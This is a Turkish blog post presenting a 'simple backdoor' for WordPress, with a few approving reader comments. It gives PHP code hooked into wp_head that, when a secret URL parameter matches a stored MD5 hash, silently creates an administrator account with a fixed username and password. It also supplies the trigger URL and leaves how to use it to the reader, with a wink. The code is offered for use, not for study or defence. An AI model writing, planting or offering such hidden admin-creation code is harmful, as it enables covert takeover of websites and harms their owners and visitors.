Çözümler

WordPress Hack: Basit Backdoor

Backdoor yani Türkçe anları arka kapı olan bu basit hack türünü WordPress’e göre düzenlenmiş halidir. Kullanım gayet basit. Eklemeniz gereken kod aşağıda.

Wordpress Backdoor
add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
 if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
 require( 'wp-includes/registration.php' );
 if ( !username_exists( 'mr_admin' ) ) {
 $user_id = wp_create_user( 'admincan', 'sifresifre' );
 $user = new WP_User( $user_id );
 $user->set_role( 'administrator' );
 }
 }
 }

Daha sonra bu işleme ulaşmak için URL; “http://www.site.com/?backdoor=go”

Bu kodun yaptığı tam olarak URL çağırıldığında “admincan” kullanıcı adında, “sifresifre” şifreli bir yönetici hesabını gizli bir şekilde oluşturmaktadır. Kullanım alanı size kalmış 😉

Bu Yazıya 5 Yorum Yapılmış

  1. TrSohbet Reply

    emeginize sağlık. WordPress ile alakalı çogu şeyi burdna temine de biliyoruz.

  2. Rasim Akçakaya Reply

    Gercekten gerekli ve mantıklı bilgiler veriyorsun tebrikler

  3. Bykadin Reply

    Bu açık yeni versiyonla kapatıldı diye biliyorum ama yinede bir kontrol etmek lazım tabi. Anlatım için teşekkürler.

  4. asansör perdesi Reply

    böyle basit açıklar wordpresse hiç yakışmıyor bir kontrol edelim

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir